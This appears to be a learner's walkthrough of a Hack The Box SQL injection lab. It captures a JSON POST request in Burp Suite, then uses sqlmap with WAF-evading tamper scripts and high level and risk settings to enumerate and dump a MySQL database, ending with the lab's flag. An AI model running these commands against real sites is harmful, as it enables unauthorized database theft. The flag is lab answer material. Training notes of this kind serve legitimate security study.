SQLMAP

#navigate the website manually to find potential attack vectors
root@oco:~$ BROWSER > 94.237.51.155:48261
 * potential attack vectors w/ user input fields
    - http://94.237.51.155:48261/checkout.html
    - http://94.237.51.155:48261/blog.html
    - http://94.237.51.155:48261/blog-single.html
       - comments area
    - http://94.237.51.155:48261/contact.html

#automate identification of potential attack vectors
root@oco:~$ sqlmap -u "94.237.51.155:48261" --crawl=2 --forms --dump --batch --random-agent --thread=10
 * nothing found

#perform manual inspection
#discovered post request & json formatted request
#http://94.237.51.155:48261/shop.html

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port} > Add Product to Cart
BURP > Proxy > Intercept > Raw > right-click > copy to file > burpRequest.txt
 * this method is used when intercepting potential parameters with Burp Suite along
   with exporting the complex HTTP request with lots of different header values Burp has captured

 * inspect the request and obtain any pertinent info
    - POST /action.php HTTP/1.1
      Host: 94.237.51.155:48261
      {"id":1}
       - this is a JSON/XML formatted request

#perform a basic SQLi vulnerability identification on the identified potential attack vector
#this will identify which SQLi method to use
root@oco:~$ sqlmap -r request.txt sqlmap --dump --batch --random-agent --thread=10 --no-cast --tamper=between,space2comment
 * if nothing found, then perform a through and intrusive SQLi vulnerability identification on the identified potential attack vector
 * ALT: root@oco:~$ sqlmap -r request.txt sqlmap --dump --batch --random-agent --thread=10 --no-cast --tamper=between,space2comment --level=5 --risk=3
    
#perform enumeration
root@oco:~$ sqlmap -r request.txt --banner --current-user --current-db --is-dba --dump --no-cast
 * do not use --batch as you're only after the specified information; doing so will run an extensive enumeration
    - JSON data found in POST body. Do you want to process it? [Y/n/q] Y
    - it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    - for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
    - (custom) POST parameter 'JSON id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    - do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y

root@oco:~$ cat /home/htb-ac-53539/.local/share/sqlmap/output/94.237.51.155/log

#identify the current DB
root@oco:~$ sqlmap -r request.txt --current-db --dump --batch --random-agent --thread=10 --no-cast --tamper=between,space2comment
 * production

#identify the tables in the current DB
root@oco:~$ sqlmap -r request.txt -D production --tables --dump --batch --random-agent --thread=10 --no-cast --tamper=between,space2comment
 * +-------------+
   | brands      |
   | categories  |
   | final_flag  |
   | order_items |
   | products    |
   +-------------+

#identify columns
root@oco:~$ sqlmap -r request.txt -D production -T final_flag --dump -batch --random-agent --thread=10 --no-cast --tamper=between,space2comment
 * HTB{n07_50_h4rd_r16h7?!}
 
#extract info on specific columns
root@oco:~$ sqlmap -r request.txt -D {dataBase} -T {table} -C {columnName1,columnName2} --dump -batch --random-agent --thread=10 --no-cast --tamper=between,space2comment